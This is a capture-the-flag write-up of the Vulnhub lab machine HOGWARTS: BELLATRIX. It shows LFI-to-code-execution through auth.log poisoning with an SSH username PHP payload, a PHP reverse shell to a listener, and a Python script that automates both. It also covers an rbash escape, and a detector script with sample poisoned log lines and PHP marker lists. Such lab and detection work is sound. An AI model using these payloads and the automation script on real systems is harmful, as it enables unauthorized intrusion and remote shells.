Vulnhub - HOGWARTS: BELLATRIX
The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic
This works better in VirtualBox
Hints –> Brute force is not necessary, unless it is required. ncat is the key ;)
This is HOGWARTS: BELLATRIX from Vulnhub.
Only SSH and HTTP are open.
On the front page of the website we get a long string of text repeating the phrase ikilledsiriusblack 44 times (I think) and finally ending with .php. In the page source we get the following hints:
Nah … this time there are no clues in the source code …
o yeah, maybe I’ve already told you a directory .php? :)
$file = $_GET['file'];
In case it's not obvious: that line takes the file parameter straight from the query string and includes it, so this is a Local File Inclusion (LFI), and the ncat hint in the description points at log poisoning as the way to turn it into code execution. (The fix is the usual one: map the parameter onto an allowlist of known files instead of using it as a path.) Let's dig in.
The hints made it relatively obvious, but the LFI was here:
With /etc/passwd I could see we had two users, lestrange and bellatrix. I haven't read (or watched) Harry Potter so I don't know if these two are related or something. My daughter is reading it now, maybe she can tell me. I could read the Apache configuration files, but even though I knew where the log files were I couldn't read them. So how to do the log poisoning?
You can do auth.log poisoning with an attempted SSH login. sshd writes the attempted username verbatim into auth.log ("Invalid user <name> from <ip> port <n>") as soon as the userauth request arrives, so no password is needed, and a username that is a PHP tag ends up in the log. When the log is later pulled through the LFI, PHP executes that tag instead of printing it, so the code itself is consumed and only its output shows up. Keep the payload short, since sshd truncates the username in that log line (to 100 characters in OpenSSH):
root@kali:/opt/vulnhub/bellatrix# ssh "<?php system(\$_GET['cmd']); ?>"@192.168.1.158
(The backslash stops the local shell from expanding $_GET to nothing before ssh sees it; answer the password prompt with anything or Ctrl-C, the failed attempt alone writes the line.)
And I could read /var/log/auth.log, so this was the way in. When I read auth.log through the LFI I couldn't see my PHP code where I thought it should be, but I sent a few commands with Burp Suite Repeater and it was definitely responding, e.g.:
GET /ikilledsiriusblack.php?file=../../../../../../../../../../../var/log/auth.log&cmd=pwd HTTP/1.1
This was my reverse shell command (listener waiting on 192.168.1.150:1234; the spaces are sent as + and the =, ; and & in the payload are URL-encoded so they survive as query-string data):
GET /ikilledsiriusblack.php?file=../../../../../../../../../../../var/log/auth.log&cmd=php+-r+'$sock%3dfsockopen("192.168.1.150",1234)%3bexec("/bin/sh+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
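Putting the steps above together, as an added example rather than the writeup's own code: a small Python 3 script (standard library only) that does the SSH poisoning, builds the LFI request with proper URL encoding, and generates the php -r reverse shell for any listener. The IP addresses are the ones the writeup uses; the traversal depth, the stager and all function names are my assumptions. One caveat: OpenSSH clients from 9.6 onward may refuse a username containing shell metacharacters depending on their configuration, so if ssh complains about the user name, do the poisoning step with an older client or an SSH library.

```python
#!/usr/bin/env python3
"""auth.log poisoning through the ikilledsiriusblack.php LFI.

Added example, not code from the original writeup. Assumed: the target and
listener addresses (taken from the writeup's own IPs), the traversal depth,
and all function names, which are mine.
"""
import subprocess
import sys
import urllib.parse
import urllib.request

TARGET = "192.168.1.158"                 # assumption: box IP as in the writeup
LFI_PATH = "/ikilledsiriusblack.php"
LOG_FILE = "/var/log/auth.log"
TRAVERSAL = "../" * 11                   # as in the writeup; extra ../ past / are harmless
# Keep the stager short: sshd logs only the first 100 characters of an invalid
# username, and the whole tag is consumed (executed) when PHP includes the log.
PHP_STAGER = "<?php system($_GET['cmd']); ?>"


def poison_auth_log(target=TARGET, stager=PHP_STAGER):
    """Make one failed SSH login whose username is the PHP stager.

    sshd writes 'Invalid user <stager> from <ip> port <n>' to auth.log as soon
    as the userauth request arrives, so no password is needed. Passing argv
    as a list avoids local shell quoting of the $, < and ; in the stager.
    Returns ssh's exit status (non-zero is expected: the login fails).
    """
    argv = ["ssh", "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=no",
            "-o", "UserKnownHostsFile=/dev/null", "-o", "ConnectTimeout=5",
            f"{stager}@{target}"]
    return subprocess.run(argv, stdin=subprocess.DEVNULL,
                          stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode


def build_lfi_url(cmd, target=TARGET, log_file=LOG_FILE):
    """GET that includes the poisoned log and feeds `cmd` to the stager.

    quote_plus does what the writeup did by hand: spaces become +, and the
    =, ;, & and quotes in a payload become %3D, %3B, %26 and so on, so they
    travel as query-string data instead of being parsed as separators.
    """
    path = TRAVERSAL + log_file.lstrip("/")
    return f"http://{target}{LFI_PATH}?file={path}&cmd={urllib.parse.quote_plus(cmd)}"


def php_reverse_shell(lhost, lport):
    """The php -r one-liner from the writeup, parametrised for any listener.

    fsockopen() in a fresh php -r process gets fd 3 (0-2 are stdio), which is
    why /bin/sh's stdin, stdout and stderr are all pointed at &3.
    """
    return (f"php -r '$sock=fsockopen(\"{lhost}\",{lport});"
            "exec(\"/bin/sh -i <&3 >&3 2>&3\");'")


def run_cmd(cmd, target=TARGET, timeout=15):
    """Trigger the stager and return the response body.

    The body is auth.log as rendered by PHP: the stager itself is gone
    (executed, not echoed) and the command output appears where it stood.
    """
    with urllib.request.urlopen(build_lfi_url(cmd, target), timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    # Usage: script.py [command]   (default: id). Start the listener first
    # (e.g. ncat -lvnp 1234) if you pass the reverse shell as the command.
    poison_auth_log()
    command = sys.argv[1] if len(sys.argv) > 1 else "id"
    print(run_cmd(command))
```

Run it with no arguments to poison the log and run id; to get the shell, pass the string php_reverse_shell() returns as the argument with ncat listening. Poisoning only has to happen once per log file: every later request just includes the same line again, so a second ssh attempt is not needed per command, and if the stager ever gets mangled (a PHP syntax error in the log breaks every include of it), wait for log rotation or poison a different log.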
And I was in.
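The defender's side of the same trick, as an added example that is not part of the writeup: a check over sshd's invalid-user lines for "usernames" that are really PHP. sshd logs the attempted name verbatim, which is both why the attack works and why it is easy to spot. The sample auth.log lines below are constructed to mimic what the SSH-username trick leaves behind (hostname, PIDs, timestamps and the sudo line are made up), and the function names are mine.

```python
#!/usr/bin/env python3
"""Spot auth.log poisoning attempts in sshd 'invalid user' lines.

Added example, not from the original writeup. The log lines below are
constructed to look like what the SSH-username trick leaves behind; the
hostname, PIDs, timestamps and the sudo line are made up.
"""
import re

SAMPLE_AUTH_LOG = """\
Feb  2 10:11:12 bellatrix sshd[1234]: Invalid user admin from 192.168.1.150 port 50112
Feb  2 10:11:14 bellatrix sshd[1234]: Failed password for invalid user admin from 192.168.1.150 port 50112 ssh2
Feb  2 10:12:40 bellatrix sshd[1240]: Invalid user <?php system($_GET['cmd']); ?> from 192.168.1.150 port 50120
Feb  2 10:12:41 bellatrix sshd[1240]: Connection closed by invalid user <?php system($_GET['cmd']); ?> 192.168.1.150 port 50120 [preauth]
Feb  2 10:13:05 bellatrix sudo: lestrange : TTY=pts/0 ; PWD=/home/lestrange ; USER=root ; COMMAND=/usr/bin/vim
"""

# Both shapes sshd uses: "... invalid user NAME from IP port N" and
# "Connection closed by invalid user NAME IP port N".
INVALID_USER_RE = re.compile(
    r"invalid user (?P<user>.+?) (?:from )?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+",
    re.IGNORECASE,
)
# Anything that would run if the line were include()d by PHP.
PHP_MARKERS = ("<?", "?>", "$_GET", "$_POST", "$_REQUEST", "system(", "passthru(",
               "shell_exec(", "exec(", "eval(")
# Shape of a normal Unix account name; anything else in that field is worth a look.
PLAIN_USERNAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_.-]*\$?$")


def classify_username(user):
    """Return 'php-stager', 'odd-chars' or None for a logged username."""
    if any(marker in user for marker in PHP_MARKERS):
        return "php-stager"
    if not PLAIN_USERNAME_RE.match(user):
        return "odd-chars"
    return None


def find_poisoned(log_text):
    """Scan auth.log text; return one dict per suspicious invalid-user line."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = INVALID_USER_RE.search(line)
        if m is None:
            continue
        verdict = classify_username(m["user"])
        if verdict is not None:
            hits.append({"line": lineno, "ip": m["ip"],
                         "user": m["user"], "verdict": verdict})
    return hits


def sources(hits):
    """Collapse hits to the set of source IPs, the thing to block or hunt on."""
    return sorted({h["ip"] for h in hits})


if __name__ == "__main__":
    for hit in find_poisoned(SAMPLE_AUTH_LOG):
        print(f"line {hit['line']}: {hit['verdict']} from {hit['ip']}: {hit['user']!r}")
```

A php-stager hit means the log is already a loaded gun: any LFI on the same host turns it into code execution, so the follow-up is to look in the web server's access log for requests that include that log path (or any path with ../ in it) from the same source. Rotating the log does not help once the stager line has been included, and the odd-chars verdict will also catch the plainer cousins of this trick (usernames with spaces or shell syntax).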
On the box
In /var/www/html we find a directory called 'c2VjcmV0cw=='. Uh … what? It's base64 for 'secrets'.
Oh, okay then. In there we have:
That's a list of possible passwords (.secret.dic) and a hash (Swordofgryffindor):
I’ll give them both to John:
Now we can SSH in as lestrange.
Lestrange has rbash as his login shell, which makes life difficult. We can escape it though: asking ssh to run a command makes rbash execute it with -c rather than as a login shell, so the profile that would normally pin PATH down is never read, and `bash` (no slash in the name, so rbash doesn't refuse it) starts unrestricted; --noprofile keeps it that way:
root@kali:/opt/vulnhub/bellatrix# ssh lestrange@bellatrix -t "bash --noprofile"
Once we've done that, we find out that lestrange can run vim through sudo as any user, and that's our privesc per GTFOBins: